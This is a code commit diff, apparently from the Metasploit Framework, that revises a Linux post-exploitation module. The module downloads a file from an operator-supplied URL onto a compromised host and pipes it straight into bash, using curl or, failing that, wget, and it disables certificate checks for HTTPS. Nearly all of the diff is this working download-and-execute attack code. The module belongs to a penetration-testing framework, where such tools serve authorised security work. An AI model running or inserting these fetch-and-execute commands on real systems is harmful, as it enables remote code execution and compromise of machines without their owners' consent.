bug/bundler_fix
jvazquez-r7 2013-03-21 17:10:58 +01:00
commit 4f0be52a0d
1 changed files with 43 additions and 21 deletions

View File

@ -18,12 +18,13 @@ class Metasploit3 < Msf::Post
include Msf::Post::File include Msf::Post::File
include Msf::Post::Linux::System include Msf::Post::Linux::System
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
'Name' => 'Linux Download Exec', 'Name' => 'Linux Manage Download and Exececute',
'Description' => %q{ 'Description' => %q{
This module downloads and runs a file with bash. It uses curl and bash from the PATH. This module downloads and runs a file with bash. It first tries to uses curl as
its HTTP client and then wget if it's not found. Bash found in the PATH is used to
execute the file.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -41,8 +42,17 @@ class Metasploit3 < Msf::Post
end end
def cmd_exec_vprint(cmd)
vprint_status("Executing: #{cmd}")
output = cmd_exec(cmd)
if output.length > 0
vprint_status("#{output}")
end
return
end
def exists_exe?(exe) def exists_exe?(exe)
path = expand_path("$PATH") path = expand_path(ENV['PATH'])
if path.nil? or path.empty? if path.nil? or path.empty?
return false return false
end end
@ -54,28 +64,40 @@ class Metasploit3 < Msf::Post
return false return false
end end
def run def search_http_client
print_status("Checking if curl exists in the path...") print_status("Checking if curl exists in the path...")
if exists_exe?("curl") if exists_exe?("curl")
print_good("curl available, going ahead...") print_good("curl available, using it")
else @stdout_option = ""
print_warning("curl not available on the $PATH, aborting...") @http_client = "curl"
@ssl_option = "-k"
return
end
print_status("Checking if wget exists in the path...")
if exists_exe?("wget")
print_good("wget available, using it")
@http_client = "wget"
@stdout_option = "-O-"
@ssl_option = "--no-check-certificate"
return
end
end
def run
search_http_client
if not @http_client
print_warning("neither curl nor wget available in the $PATH, aborting...")
return return
end end
if datastore['URL'].match(/https/) if datastore['URL'].match(/https/)
cmd_exec_vprint("`which curl` -k #{datastore['URL']} 2>/dev/null | `which bash` ") cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
else else
cmd_exec_vprint("`which curl` #{datastore['URL']} 2>/dev/null | `which bash` ") cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
end end
end end
def cmd_exec_vprint(cmd)
vprint_status("Executing: #{cmd}")
output = cmd_exec(cmd)
if output.length > 0
vprint_status("#{output}")
end
return
end
end end